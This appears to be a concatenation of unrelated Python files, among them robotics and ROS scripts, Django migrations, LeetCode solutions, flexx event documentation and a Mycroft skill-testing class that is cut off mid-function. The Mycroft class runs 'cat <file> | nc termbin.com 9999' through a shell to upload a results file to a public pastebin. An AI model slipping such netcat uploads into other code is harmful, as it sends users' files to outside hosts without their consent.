r = 3
for i in range(len(fin)):
q = solveABC(A2, fin[i])
str = "p_x(t) = {}t^5 + {}t^4 + {}t^3 + {}\\\\\n".format(round(q[0][0],r), round(q[0][1],r), round(q[0][2],r),ini[i][0])
str += "p_y(t) = {}t^5 + {}t^4 + {}t^3 + {}\\\\\n".format(round(q[1][0],r), round(q[1][1],r), round(q[1][2],r),ini[i][1])
print(str)
def p6():
man = robotics.manipulator()
man.addlink('r')
man.addlink('r')
man.addlink('p')
man.addlink('r')
J = man.Jacobian()
print(J)
B = robotics.insert(J, a=[0, 0, 0, 1.15], th=[None, None, math.pi, None],
al=[-math.pi / 2, math.pi / 2, math.pi / 2, math.pi / 2], d=[1.7, 0, None, 0])
print(latex.Lmatrix(B.simplify(), num=['al','a','th','d']))
if __name__ == "__main__":
#p4()
#p5()
p6() |
#!/usr/bin/python3
import zmq
import numpy as np
port = 8887
context = zmq.Context()
socket = context.socket(zmq.SUB)
socket.connect("tcp://127.0.0.1:%s"%port) #raspberry pi ip address
topicfilter=b""
socket.setsockopt(zmq.SUBSCRIBE,topicfilter)
while True:
string = socket.recv()
#print string
data = np.fromstring(string, dtype="float")
print(data)
|
# Generated by Django 2.1.7 on 2019-03-30 11:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('notification', '0004_auto_20190330_1439'),
]
operations = [
migrations.AddField(
model_name='globalnotification',
name='Pay',
field=models.PositiveIntegerField(null=True),
),
migrations.AddField(
model_name='globalnotification',
name='Working_Hour',
field=models.PositiveIntegerField(null=True),
),
migrations.AlterField(
model_name='globalnotification',
name='Date',
field=models.DateField(blank=True, help_text='Please enter in the format mm/dd/yyyy', null=True),
),
]
|
# school = "Digital School"
# print("Digital Crafts")
# print("Digital Crafts")
# print("Digital Crafts")
# print("Digital Crafts")
# print("Digital Crafts")
# student1 = "Andrea"
# student2 = "Zach"
# student3 = "Michael"
# student4 = "Rick"
# "Good Morning"
# formatting = "{} {} {} {}".format(student1, student2, student3, student4)
# print(formatting)
day = "Wednesday"
tomorrow = "Thursday"
currentDay = f"Today is {day}"
currentDay1 = f"Tomorrow is {tomorrow}"
# print(f"Today is {day}")
print (currentDay)
print (currentDay1) |
import cv2
import numpy as np
import json
import re
import pandas as pd
import sys
import glob
import os
import cv2
import numpy as np
import json
import re
import pandas as pd
import sys
import glob
import os
import csv
#IMAGE AND CSV FILE LOCATIONS THIS CODE ASSUMES THEY ARE IN THE SAME FOLDER
json_fns = glob.glob("E:\\lastresults\**\\*.jpg", recursive=True)
print(json_fns)
numfiles=len(json_fns)
nf=0
while (nf>=0 and nf<numfiles):
nff=0
z=json_fns[nf]
image_name= os.path.basename(json_fns[nf])
lent=len(image_name)
base=z[:-lent]
linecounter=0
print(json_fns[nf])
pathcsv=json_fns[nf][:-4]+".csv"
if os.path.exists(pathcsv)is False:
nf=nf+1
continue
# #os.rename(path,path2)
else:
x=0
img = cv2.imdecode(np.fromfile(json_fns[nf], dtype=np.uint8),
cv2.IMREAD_UNCHANGED)
with open(pathcsv,'r') as input_file:
input=csv.reader(input_file,delimiter=' ')
totalbird=len((list(input)))-1
totalbird=str(int(totalbird/4))
input_file.close()
with open(pathcsv,'r') as input_file:
input=csv.reader(input_file,delimiter=' ')
for line in input:
if linecounter==0:
linecounter+=1
continue #ignoring first line for getting cordinates
else:
if linecounter%4==1:
cordinates=line[0].split(",")
#print(cordinates)
xmin=int(cordinates[1])
ymin=int(cordinates[2])
#print("i was here"+str(xmin,ymin))
linecounter+=1
elif linecounter%4==2:
linecounter+=1
elif linecounter%4==3:
linecounter+=1
elif linecounter%4==0:
cordinates=line[0].split(",")
xmax=int(cordinates[1])
ymax=int(cordinates[2])
img = cv2.rectangle(img,(xmin,ymin),(xmax,ymax),(0,0,255),3)
#min cordinates, max cordinates, color, thickness
linecounter+=1
#print(nf)
pathy=json_fns[nf][:-4]+"_"+totalbird+".jpg"#save path
nf=nf+1 #img=cv2.imread(json_fns[nf])
is_success,im_buf_arr = cv2.imencode(".jpg", img)
im_buf_arr.tofile(pathy)
input_file.close()
|
# Generated by Django 3.1.7 on 2021-02-22 11:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('store', '0012_order_total'),
]
operations = [
migrations.AlterField(
model_name='order',
name='total',
field=models.FloatField(blank=True, null=True),
),
]
|
# Generated by Django 3.1.3 on 2020-12-12 17:28
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('rareserverapi', '0003_auto_20201211_0140'),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('content', models.TextField()),
('subject', models.CharField(max_length=255)),
('created_on', models.DateTimeField(auto_now_add=True)),
('author_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='rareusers', related_query_name='rareuser', to='rareserverapi.rareusers')),
('post_id', models.ForeignKey(blank=True, on_delete=django.db.models.deletion.CASCADE, related_name='posts', related_query_name='post', to='rareserverapi.post')),
],
),
]
|
from utils import regex_utils
from utils.log_utils import log
class InsertProcessor:
def __init__(self, broker, client_model, global_model):
self.broker = broker
self.client_model = client_model
self.global_model = global_model
self.log = log
def _is_client_regex(self, payload: dict):
try:
return (payload['client'] is not None) and (not payload['client'].strip() == "")
except Exception as e:
self.log.error(f"Error on process payload {e}")
def _is_valid_payload(self, payload):
is_valid_regex = False
required_fields = ['client',
'regex']
is_required_fields = len(set(required_fields) & set(
payload.keys())) == len(required_fields)
if is_required_fields:
is_valid_regex = regex_utils.is_valid_regex(payload['regex'])
return is_required_fields and is_valid_regex
def process(self, payload: dict):
if self._is_valid_payload(payload):
if self._is_client_regex(payload):
client_name = payload['client']
regex = payload['regex']
response = self.client_model.insert_client_regex(client_name, regex)
self.log.info(f"Added new regex [client]: {payload}")
return payload
else:
regex = payload['regex']
response = self.global_model.insert_global_regex(regex)
self.log.info(f"Added new regex [global]: {payload}")
return payload
else:
self.log.error('Invalid payload %s' % str(payload))
|
class Solution(object):
# DFS is O(2^n)
# with backtracking, DFS is O(n!)~O(2^n)
# DFS solution can only handle small cases(i.e.target<=25 && len(nums)<=5), due to large list memory usage of res.
def combinationSum4(self, nums, target):
"""
:type nums: List[int]
:type target: int
:rtype: int
"""
nums.sort()
res = []
self.dfs(nums, target, [], res)
return len(res)
def dfs(self, nums, target, path, res):
if target<0:
return
if target==0:
res.append(path)
return
for i in range(len(nums)):
self.dfs(nums, target - nums[i], path+[nums[i]], res)
## when we only care about number, it can be reduce to a simpler problem
## become basically the coin change probelm
## O(nlogn + target*n)
def combinationSum2(self, nums, target):
nums.sort()
dp = [0]*(target + 1)
dp[0] = 1
for i in range(1, target+1):
for num in nums:
if num > i: ## dp can do prune brunch as well
break
dp[i]+=dp[i-num]
return dp[target]
## lets compare the coin change and the combination sum IV, they are the same
## general summary: how many number of combinations
def coinChange(self, coins, amount):
"""
:type coins: List[int]
:type amount: int
:rtype: int
"""
MAX = float('inf')
dp = [0] + [MAX]*amount
coins.sort() ## sort the coin break to prune brunch
for i in range(1, amount+1):
for c in coins:
if i-c>=0:
dp[i] = min(dp[i], dp[i-c]+1)
else:
break
return dp[-1] if dp[-1]!=MAX else -1 |
from datetime import date
from MEME import lista
from pymongo import MongoClient
fecha = date.today()
mongo_data = {fecha: lista}
client = MongoClient('localhost', 27017)
db = client['Google_Trends']
tendencias = db[str(fecha)]
tendencia = {'Top 25': lista}
insertado = tendencias.insert_one(tendencia)
|
#!/usr/bin/env python
import rospy
import serial
from jsk_mbzirc_board.srv import *
from std_msgs.msg import Int16
class Serial_board:
def __init__(self):
self.T_HEADER = 'TH'
self.T_TAIL = 'TT'
self.Magdata = 'mag:!'
self.port = '/dev/ttyTHS2'
self.baud = 115200
self.verbose = True
self.serialtimeout = 0.01
self.updaterate = 20 #20hz
#initialize the parameters
self.port = rospy.get_param("~port", self.port)
self.baud = rospy.get_param('~baud', self.baud)
self.verbose = rospy.get_param('~verbose', self.verbose)
self.serialtimeout = rospy.get_param('~serialtimeout', self.serialtimeout)
self.updaterate = rospy.get_param('~updaterate', self.updaterate)
rospy.loginfo("port is : %s" % self.port)
rospy.loginfo("baudrate is: %s " % self.baud )
self.ser = serial.Serial(self.port, self.baud, timeout=self.serialtimeout)
#if not (self.ser._isOpen()):
# rospy.ROSException("Cant open port %s" % self.baud)
#magnets service server
self._srv_magnet = rospy.Service("/serial_board/magnet_control", Magnet, self.__Magnet_Service)
#magnets switch publisher
self._pub_magnet = rospy.Publisher("/serial_board/magnet_feedback", Int16, queue_size = 1)
#laser distance publisher
self._pub_pointlaser = rospy.Publisher("/serial_board/point_laser", Int16, queue_size = 1)
#delete function
def __del__(self):
self.ser.close()
#magnet call
def __Magnet_Service(self, req):
time = req.time_ms
if (time > 65534 and time < 0):
return False
t_size = 3;
time_high8b = chr(time/256)
time_low8b = chr(time%256)
onoff = chr(req.on)
#send on order and seconds, low byte first
datatosend = self.T_HEADER + chr(t_size) + chr(req.on) + time_low8b + time_high8b + self.T_TAIL
#datatosend = "mag:!5!"
self.ser.write(datatosend)
return True
def Serial_Update(self):
#always read the data
r = rospy.Rate(self.updaterate)
while not rospy.is_shutdown():
data_in = self.ser.readall()
if data_in:
if self.verbose:
rospy.loginfo(data_in)
#data will be like mag:!5!#223#
index = data_in.find(self.Magdata)
if not (index < 0):
index +=5
self._pub_magnet.publish(int(data_in[index:data_in.find('!',index)]))
#now get the distance
index = data_in.find('!#')
index +=2
distbyte = data_in[index:data_in.find('#',index)]
if distbyte:
rospy.loginfo(int(distbyte.strip('\0')))
self._pub_pointlaser.publish(int(distbyte.strip('\0')))
r.sleep()
if __name__ == "__main__":
rospy.init_node('serial_board')
ex = Serial_board()
try:
ex.Serial_Update()
except rospy.ROSInterruptException: pass
|
import csv
import sys
days = {}
countlines = {}
with open(sys.argv[1]) as csvfile:
carsin = csv.reader(csvfile, delimiter=',')
for row in carsin:
countline = row[0]
year = row[1]
month = row[2]
day = row[3]
count = row[4]
date = year+month+day
if countline not in countlines:
countlines[countline] = date
if not date in days:
days[date] = {}
days[date][countline] = count
#print(days['20200410'])
#print(countlines)
# Print a header line with the column names
line = "Date,TOTAL"
for countline in countlines:
line += ","+countline
print(line)
# Print a line-per-day containing Date, TOTAL, and a column for each countline
for date in days:
total = 0
line = ""
for countline in countlines:
# the 'count' from the input data is a string
if not countline in days[date]:
print("countline "+countline+" missing from "+date, file=sys.stderr)
count=str(0)
else:
count=days[date][countline]
total += int(count) # somehow I found this line and the next pleasingly symmetrical
line += ","+count
print(date+","+str(total)+line)
|
mqtt = {
'username': 'YourUsername',
'password': 'YourPassword',
'ip': '192.168.#.##',
'port': 1883,
'timeout': 60,
'topic' :{
'subscribe': {
'topic_key': 'topic'
},
'publish': {
'publish_key': 'topic'
}
}
}
|
"""
The event module provides a system for properties and events,
to let different components of an application react to each-other and
to user input.
In short:
* The :class:`Component <flexx.event.Component>` class provides a base class
which can be subclassed to create the different components of an app.
* Each component has :class:`properties <flexx.event.Property>` to reflect
the state of the component.
* Properties can only be mutated by :class:`actions <flexx.event.action>`.
Calling (i.e. invoking) an action will not apply the action at once; actions
are processed in batches.
* When properties are modified (i.e. the state is changed),
corresponding :class:`reactions <flexx.event.reaction>`
will be invoked. The reactions are processed when all pending actions
are done. This means that during processing reactions, the state never changes,
which is a great thing to rely on!
* Reactions can also react to events generated by :func:`emitters <flexx.event.emitter>`,
such as mouse events.
* The :class:`event loop <flexx.event.Loop>` object is responsible for scheduling
actions and reactions and can be used by the user to e.g. make a function be
called later. It intergrates with Python's own asyncio loop.
The asynchronous nature of actions combined with the fact that the state does
not change during processing reactions, makes it easy to reason about
cause and effect. The information flows in one direction. This concept was
gratefully taken from modern frameworks such as React/Flux and Veux.
.. image:: https://docs.google.com/drawings/d/e/2PACX-1vSHp4iha6CTgjsQ52x77gn0hqQP4lZD-bcaVeCfRKhyMVtaLeuX5wpbgUGaIE0Sce_kBT9mqrfEgQxB/pub?w=503
One might suggest that the information flow is still circular, because there
is an arrow going from reactions to actions. This is true, but note that
actions invoked from reactions are not directly executed; they are pended and
will be executed only after all reactions are done.
Relation to other parts of Flexx
--------------------------------
This event system and its :class:`Component <flexx.event.Component>` class
form the basis for :class:`app.PyComponent <flexx.app.PyComponent>`,
:class:`app.JsComponent <flexx.app.JsComponent>` and the UI system
in ``flexx.ui``. It can be used in both Python and JavaScript and works exactly
the same in both languages.
Other than that, this is a generic event system that could drive any system
that is based on asyncio.
Event object
------------
An event is something that has occurred at a certain moment in time,
such as the mouse being pressed down or a property changing its value.
In Flexx, events are represented with dictionary objects that
provide information about the event (such as what button was pressed,
or the old and new value of a property). A custom :class:`Dict <flexx.event.Dict>`
class is used that inherits from ``dict`` but allows attribute access,
e.g. ``ev.button`` as an alternative to ``ev['button']``.
Each event object has at least two attributes: ``source``,
a reference to the Component object emitting the event, and ``type``, a string
indicating the type of the event.
The Component class
-------------------
The :class:`Component <flexx.event.Component>` class provides a base
class for objects that have properties, actions, reactions and emitters.
E.g. ``flexx.ui.Widget`` inherits from ``flexx.app.JsComponent``,
which inherits from ``flexx.event.Component``.
.. code-block:: python
class MyObject(event.Component):
... # attributes/properties/actions/reactions/emitters go here
def init(self):
super().init()
...
It is common to implement the ``init()`` method of the component class. It gets
automatically called by the component, at a moment when all properties have
been initialized, but no events have been emitted yet. This is a good time
to further initialize the component, and/or to instantiate sub components.
One rarely needs to implement the ``__init__()`` method.
When the ``init()`` is called, the component is the currently "active"
component, which can be used to e.g. descrive a hierarchy of objects, as is
done with widgets. It also implies that mutations are allowed and that actions
on the component itself have a direct effect (invoking actions of other
components is still asynchronous though).
Properties represent state
--------------------------
:class:`Properties <flexx.event.Property>` can be defined using one of
the several property classes. For example:
.. code-block:: python
class MyObject(event.Component):
foo = event.AnyProp(8, settable=True, doc='can have any value')
bar = event.IntProp()
Properties accept one positional arguments to set the default value. If not
given, a sensible default value is used that depends on the type of property.
The ``foo`` property above is marked as settable, so that the class will have
a ``set_foo()`` action. Docs can be added too. Note that properties
are readonly: they can can only be mutated by actions.
Property values can be initialized when a component is created (also
non-settable properties):
.. code-block:: python
c = MyComponent(foo=42)
One can also set the initial value of a property to a function object.
This creates an auto-reaction that sets the property, and makes it possible
to hook things up in a very concise manner. In the example below, the label
text will be automatically updated when the username property changes:
.. code-block:: python
c = UiLabel(text=lambda: self.username)
An event is emitted every time that a property changes. This event has attributes
``old_value`` and ``new_value`` (except for in-place array mutations, as
explained below). At initialization, a component sends out an event for each property,
which has the same value for ``old_value`` and ``new_value``.
Component classes can also have :class:`Attributes <flexx.event.Attribute>`,
which are read-only (usually static) non-observable values (e.g. ``JsComponent.id``).
Actions can mutate properties
-----------------------------
:class:`Actions <flexx.event.action>` can be defined to mutate properties:
.. code-block:: python
class MyObject(event.Component):
foo = event.AnyProp(8, settable=True, doc='can have any value')
bar = event.IntProp()
@event.action
def increase_bar(self):
self._mutate_bar(self.bar + 1)
# shorthand for self._mutate('bar', self.bar + 1)
Actions can have any number of (positional) arguments. Note that actions are
asynchronous, i.e. calling an action will not apply it immediately, unless it is
called from another action.
Since actions are asynchronous, their inner function should not return a value.
Invoking (i.e. calling) an action always returns the component itself, which
allows chainging action invokations, e.g. ``t.scale(3).translate(3, 4)``
Mutations are done via the :func:`_mutate <flexx.event.Component._mutate>` method,
or by the auto-generated ``_mutate_xx()`` methods.
Mutations can only be done from an action. Trying
to do so otherwise will result in an error. This may seem limiting at first,
but it greatly helps keeping it easy to reason about information flowing
through your application, even as it scales.
Mutations to array-like properties
----------------------------------
The above shows the simple and most common use of mutations. For list
properties, mutations can also be done in-place:
.. code-block:: python
class MyObject(event.Component):
items = event.ListProp()
def add_item(self, item):
self._mutate_items([item], 'insert', len(self.items))
This allows more fine-grained control over state updates, which can also
be handled by reactions in much more efficient ways. The types of mutations are
'set' (the default), 'insert', 'replace', and 'remove'. In the latter, the
provided value is the number of elements to remove. For the others it must
be a list of elements to set/insert/replace at the specified index.
Emitters create events
----------------------
:func:`Emitters <flexx.event.emitter>` make it easy to generate events.
Similar to actions, they are created with a decorator.
.. code-block:: python
class MyObject(event.Component):
@event.emitter
def pointer_down(self, js_event):
''' Event emitted when the mouse/touchpad/screen is pressed.
'''
return dict(button=js_event.button)
Emitters can have any number of arguments and should return a dictionary,
which will get emitted as an event, with the event type matching the name
of the emitter.
Note that stricly speaking emitters are not necessary as ``Component.emit()``
can be used to generate an event. However, they provide a mechanism to
generate an event based on certain input data, and also document the
events that a component may emit.
Reactions
---------
:func:`Reactions <flexx.event.reaction>` are used to react to events and
changes in properties, using an underlying handler function:
.. code-block:: python
class MyObject(event.Component):
first_name = event.StringProp(settable=True)
last_name = event.StringProp(settable=True)
@event.reaction('first_name', 'last_name')
def greet(self, *events):
print('hi', self.first_name, self.last_name)
@event.reaction('!foo')
def handle_foo(self, *events):
for ev in events:
print(ev)
This example demonstrates multiple concepts. Firstly, the reactions are
connected via *connection-strings* that specify the types of the
event; in this case the ``greeter`` reaction is connected to "first_name" and
"last_name", and ``handle_foo`` is connected to the event-type "foo" of the
object. This connection-string can also be a path, e.g.
"sub.subsub.event_type". This allows for some powerful mechanics, as
discussed in the section on dynamism.
One can also see that the reaction-function accepts ``*events`` argument.
This is because reactions can be passed zero or more events. If a reaction
is called manually (e.g. ``ob.handle_foo()``) it will have zero events.
When called by the event system, it will have at least 1 event. When
e.g. a property is set twice, the function will be called
just once, but with multiple events. If all events need to be processed
individually, use ``for ev in events: ...``.
In most cases, you will connect to events that are known beforehand,
like those corresponding to properties and emitters.
If you connect to an event that is not known (like "foo" in the example
above) Flexx will display a warning. Use ``'!foo'`` as a connection string
(i.e. prepend an exclamation mark) to suppress such warnings.
Another useful feature of the event system is that a reaction can connect to
multiple events at once, as the ``greet`` reaction does.
The following is less common, but it is possible to create a reaction from a
normal function, by using the
:func:`Component.reacion() <flexx.event.Component.reaction>` method:
.. code-block:: python
c = MyComponent()
# Using a decorator
@c.reaction('foo', 'bar')
def handle_func1(self, *events):
print(events)
# Explicit notation
def handle_func2(self, *events):
print(events)
c.reaction(handle_func2, 'foo', 'bar')
# this is fine too: c.reaction('foo', 'bar', handle_func2)
Greedy and automatic reactions
==============================
Each reaction operates in a certain "mode". In mode "normal", the event system
ensures that all events are handled in the order that they were emitted. This
is often the most useful approach, but this implies that a reaction can be
called multiple times during a single event loop iteration, with other
reactions called in between to ensure the consisten event order.
If it is preferred that all events targeted at a reaction are handled with
a single call to that reaction, it can be set to mode "greedy". Cases where
this makes sense is when all related events must be processed simultenously,
or simply when performance matters a lot and order matters less.
Reactions with mode "auto" are automatically triggered when any of the
properties that the reaction uses is changed. Such reactions can be
created by specifying the ``mode`` argument, or simply by creating a
reaction with zero connections strings. We refer to such reactions as
"auto reactions" or "implicit reactions". This is a convenient feature,
but should probably be avoided when a lot (say hundreds) of properties
are accessed.
.. code-block:: python
class MyObject(event.Component):
first_name = event.StringProp(settable=True)
last_name = event.StringProp(settable=True)
@event.reaction
def greet(self):
print('hi', self.first_name, self.last_name)
A similar useful feature is to assign a property (at initialization) using a
function. In such a case, the function is turned into an implicit reaction.
This can be convenient to easily connect different parts of an app.
.. code-block:: python
class MyObject(event.Component):
first_name = event.StringProp(settable=True)
last_name = event.StringProp(settable=True)
person = MyObject()
label = UiLabel(text=lambda: person.first_name)
Reacting to in-place mutations
==============================
In-place mutations to lists or arrays can be reacted to by processing
the events one by one:
.. code-block:: python
class MyComponent(event.Component):
@event.reaction('other.items')
def track_array(self, *events):
for ev in events:
if ev.mutation == 'set':
self.items[:] = ev.objects
elif ev.mutation == 'insert':
self.items[ev.index:ev.index] = ev.objects
elif ev.mutation == 'remove':
self.items[ev.index:ev.index+ev.objects] = [] # objects is int here
elif ev.mutation == 'replace':
self.items[ev.index:ev.index+len(ev.objects)] = ev.objects
else:
assert False, 'we cover all mutations'
For convenience, the mutation can also be "replicated" using the
``flexx.event.mutate_array()`` and ``flexx.event.mutate_dict()`` functions.
Connection string syntax
========================
The strings used to connect events follow a few simple syntax rules:
* Connection strings consist of parts separated by dots, thus forming a path.
If an element on the path is a property, the connection will automatically
reset when that property changes (a.k.a. dynamism, more on this below).
* Each part can end with one star ('*'), indicating that the part is a list
and that a connection should be made for each item in the list.
* With two stars, the connection is made *recursively*, e.g. "children**"
connects to "children" and the children's children, etc.
* Stripped of '*', each part must be a valid identifier (ASCII).
* The total string optionally has a label suffix separated by a colon. The
label itself may consist of any characters.
* The string can have a "!" at the very start to suppress warnings for
connections to event types that Flexx is not aware of at initialization
time (i.e. not corresponding to a property or emitter).
An extreme example could be ``"!foo.children**.text:mylabel"``, which connects
to the "text" event of the children (and their children, and their children's
children etc.) of the ``foo`` attribute. The "!" is common in cases like
this to suppress warnings if not all children have a ``text`` event/property.
Labels
======
Labels are a feature that makes it possible to infuence the order by
which reactions are called, and provide a means to disconnect
specific (groups of) handlers.
.. code-block:: python
class MyObject(event.Component):
@event.reaction('foo')
def given_foo_handler(*events):
...
@event.reaction('foo:aa')
def my_foo_handler(*events):
# This one is called first: 'aa' < 'given_f...'
...
When an event is emitted, any connected reactions are scheduled in the
order of a key, which is the label if present, and
otherwise the name of the name of the reaction.
The label can also be used in the
:func:`disconnect() <flexx.event.Component.disconnect>` method:
.. code-block:: python
@h.reaction('foo:mylabel')
def handle_foo(*events):
...
...
h.disconnect('foo:mylabel') # don't need reference to handle_foo
Dynamism
========
Dynamism is a concept that allows one to connect to events for which
the source can change. For the following example, assume that ``Node``
is a ``Component`` subclass that has properties ``parent`` and
``children``.
.. code-block:: python
main = Node()
main.parent = Node()
main.children = Node(), Node()
@main.reaction('parent.foo')
def parent_foo_handler(*events):
...
@main.reaction('children*.foo')
def children_foo_handler(*events):
...
The ``parent_foo_handler`` gets invoked when the "foo" event gets
emitted on the parent of main. Similarly, the ``children_foo_handler``
gets invoked when any of the children emits its "foo" event. Note that
in some cases you might also want to connect to changes of the ``parent``
or ``children`` property itself.
The event system automatically reconnects reactions when necessary. This
concept makes it very easy to connect to the right events without the
need for a lot of boilerplate code.
Note that the above example would also work if ``parent`` would be a
regular attribute instead of a property, but the reaction would not be
automatically reconnected when it changed.
Implicit dynamism
=================
Implicit reactions are also dynamic, maybe even more so! In the example below,
the reaction accesses the ``children`` property, thus it will be called whenever
that property changes. It also connects to the ``visible`` event of
all children, and to the ``foo`` event of all children that are visible.
.. code-block:: python
@main.reaction
def _implicit_reacion():
for child in main.children:
if child.visible:
do_something_with(child.foo)
This mechanism is powerful, but one can see how it can potentially
access (and thus connect to) many properties, especially if the reaction
calls other functions that access more properties. Also keep in mind that
implicit reactions have more overhead (because they fully reconnect
every time after they are called). One should probably avoid them for
properties that change 100 times per second.
Patterns
--------
The event system presented here is quite flexible and designed to cover the needs
of a variety of event/messaging mechanisms. This section discusses
how this system relates to some common patterns, and how these can be
implemented.
Observer pattern
================
The idea of the observer pattern is that observers keep track (the state
of) of an object, and that an object is agnostic about what it's tracked by.
For example, in a music player, instead of writing code to update the
window-title inside the function that starts a song, there would be a
concept of a "current song", and the window would listen for changes to
the current song to update the title when it changes.
In ``flexx.event``, a ``Component`` object keeps track of its observers
(reactions) and notifies them when there are changes. In our music player
example, there would be a property "current_song", and a reaction to
take action when it changes.
As is common in the observer pattern, the reactions keep track of the
objects that they observe. Therefore both ``Reaction`` and ``Component``
objects have a ``dispose()`` method for cleaning up.
Signals and slots
=================
The Qt GUI toolkit makes use of a mechanism called "signals and slots" as
an easy way to connect different components of an application. In
``flexx.event`` signals translate to properties and assoctated setter actions,
and slots to the reactions that connect to them.
Although signals and slots provide a convenient mechanism, they make it easy
to create "spaghetti apps" where the information flows all over the place,
which is exactly what frameworks like Flux, Veux and Flexx try to overcome.
Overloadable event handlers
===========================
In Qt, the "event system" consists of methods that handles an event, which
can be overloaded in subclasses to handle an event differently. In
``flexx.event``, actions and reactions can similarly be re-implemented in
subclasses, and these can call the original handler using ``super()`` if needed.
Publish-subscribe pattern
==========================
In pub-sub, publishers generate messages identified by a 'topic', and
subscribers can subscribe to such topics. There can be zero or more publishers
and zero or more subscribers to any topic.
In ``flexx.event`` a `Component` object can play the role of a broker.
Publishers can simply emit events. The event type represents the message
topic. Subscribers are represented by handlers.
"""
import logging
logger = logging.getLogger(__name__)
del logging
import sys
assert sys.version_info > (3, 5), "Flexx.event needs Python 3.5+"
del sys
# flake8: noqa
from ._dict import Dict
from ._loop import Loop, loop
from ._action import Action, action
from ._reaction import Reaction, reaction
from ._emitter import emitter, Emitter
from ._attribute import Attribute
from ._property import *
from ._component import Component, mutate_array, mutate_dict
|
import copy
import csv
import json
import os
from os.path import join
import time
from datetime import datetime
from subprocess import check_output, Popen
from time import sleep
from mycroft import MycroftSkill, intent_file_handler
from mycroft.api import DeviceApi
from mycroft.configuration import Configuration
from mycroft.messagebus.message import Message
from mycroft.util.format import nice_duration
class SkillTesting(MycroftSkill):
def __init__(self):
MycroftSkill.__init__(self)
self.reset_test_env()
def initialize(self):
self.update_settings()
self.file_path_base = get_skills_dir()
self.file_path_reading_output = '/'.join([self.file_system.path,
'reading-output'])
if not os.path.isdir(self.file_path_reading_output):
os.mkdir(self.file_path_reading_output)
self.file_path_test = 'test/intent'
def update_settings(self):
self.input_utterances = False
self.test_identifier = self.settings.get('test_identifier')
remote_phrases = self.settings.get('phrases')
if remote_phrases is not None:
self.input_utterances = list(csv.reader([remote_phrases],
skipinitialspace=True))[0]
if not self.input_utterances:
self.log.info('No remote phrases, reading local')
try:
local_phrases = os.path.join(
self.file_system.path,
'utterances.csv'
)
with open(local_phrases) as f:
reader = list(csv.reader(f))
if len(reader) == 1:
utterances = reader[0]
else:
utterances = [ i[0] for i in reader ]
self.input_utterances = [x.strip() for x in utterances]
except FileNotFoundError:
self.log.exception('No remote or local utterances found')
else:
self.log.info('Using remote phrases')
self.delay = int(self.settings.get('delay', '30'))
@intent_file_handler('read.utterances.intent')
def read_utterances(self, message):
self.update_settings()
sleep(10)
if not self.input_utterances:
self.speak_dialog('reading.no.utterances')
return
num_tests = len(self.input_utterances)
self.log.debug('Running {} tests.'.format(num_tests))
avg_response_time = 5
estimated_length = nice_duration(self.delay * 2 + num_tests * (
self.delay + avg_response_time))
self.speak_dialog('reading.started',
data={'num': num_tests,
'estimated_length': estimated_length})
sleep(self.delay)
# Add extra utterance to call final code
# Why? Workaround as code in handler after phrase loop doesn't execute
self.input_utterances.append(self.translate('trigger.reading.complete'))
self.add_event('mycroft.skill.handler.start', self.detect_handler)
self.add_event('speak', self.detect_response)
self.add_event('recognizer_loop:audio_output_start', self.detect_audio_out)
self.add_event('recognizer_loop:record_begin', self.attempt_response)
for i, phrase in enumerate(self.input_utterances):
# if previous single result exists add to output and reset
if self.test_result:
self.all_test_results.append(self.test_result)
self.test_result = []
self.responses = []
# strip white space and text delimiters
phrase = phrase.strip().strip('"').strip()
# Extract any responses required for intent eg set timer>10 minutes
if '>' in phrase:
phrase, *self.responses = phrase.split('>')
self.log.debug("self.responses: {}".format(self.responses))
# If not the last, as last utterance triggers completion.
if i < len(self.input_utterances) - 1:
self.test_result.append(phrase)
self.test_start_time = time.time()
self.bus.emit(Message("recognizer_loop:utterance",
{'utterances': [phrase],
'lang': 'en-us'}))
sleep(self.delay)
def detect_handler(self, m):
tick = time.time()
handler_message_data = json.loads(m.serialize())['data']
self.log.debug('Detected Skill handler: {}'.format(handler_message_data))
keys = handler_message_data.keys()
# Normal Skills
if 'name' in keys:
name, intent = handler_message_data['name'].split('.')
if name == 'SkillTesting':
return
# Fallback handler
elif 'handler' in keys and len(self.test_result) == 1:
name, intent = ('Fallback','No intent triggered')
else:
name, intent = (False, False)
return
self.test_result = [self.test_result[0], name, intent, self._get_timer_interval(tick)]
def detect_response(self, m):
tick = time.time()
message_data = json.loads(m.serialize())['data']
self.log.debug('Detected spoken response: {}'.format(message_data))
if 'utterance' in message_data.keys() and \
message_data['utterance'] != self.translate('reading.complete'):
if len(self.test_result) == 1:
self.test_result.extend(('FAILED','FAILED',message_data['utterance']))
else:
self.test_result.append((message_data['utterance']))
if len(self.test_result) == 5:
self.test_result.insert(4, self._get_timer_interval(tick))
def detect_audio_out(self, m):
tick = time.time()
message_data = json.loads(m.serialize())['data']
self.log.debug('Detected audio output start: {}'.format(message_data))
if len(self.test_result) == 6:
self.test_result.insert(5, self._get_timer_interval(tick))
def attempt_response(self, m):
if self.responses:
this_response = self.responses.pop(0)
sleep(1)
self.bus.emit(Message("recognizer_loop:utterance",
{'utterances': [this_response],
'lang': 'en-us'}))
self.test_result.append(this_response)
def _get_timer_interval(self, tick):
duration = tick - self.test_start_time
return int(duration * 1000) / 1000
@intent_file_handler('reading.complete.intent')
def handle_reading_complete(self, message):
sleep(self.delay)
self.remove_event('mycroft.skill.handler.start')
self.remove_event('speak')
self.remove_event('recognizer_loop:audio_output_start')
self.speak_dialog('reading.complete')
# Save locally to potentially generate tests from
# Remove unsupported characters from filename
if self.test_identifier in (None, ''):
self.test_identifier = datetime.now().strftime('%Y-%m-%d_%H-%M-%S')
file_name = ''.join(
x for x in self.test_identifier \
if (x.isalnum() or x in "._-")) + '.csv'
# TODO Actually track which output files are created and manage them
self.output_file = '/'.join([self.file_path_reading_output, file_name])
with open(self.output_file, 'w') as f:
writer = csv.writer(f, quoting=csv.QUOTE_ALL)
writer.writerows(self.all_test_results)
# Upload to Termbin
upload_cmd = 'cat ' + self.output_file + ' | nc termbin.com 9999'
url = check_output(upload_cmd, shell=True).decode().strip('\n\x00')
# Email to User
data = {
'test_identifier': self.test_identifier,
'url': url,
'device_name': self.get_device_name(),
'num_tests': len(self.all_test_results) - 1
}
email = '\n'.join(self.translate_template('phrase.results.email', data))
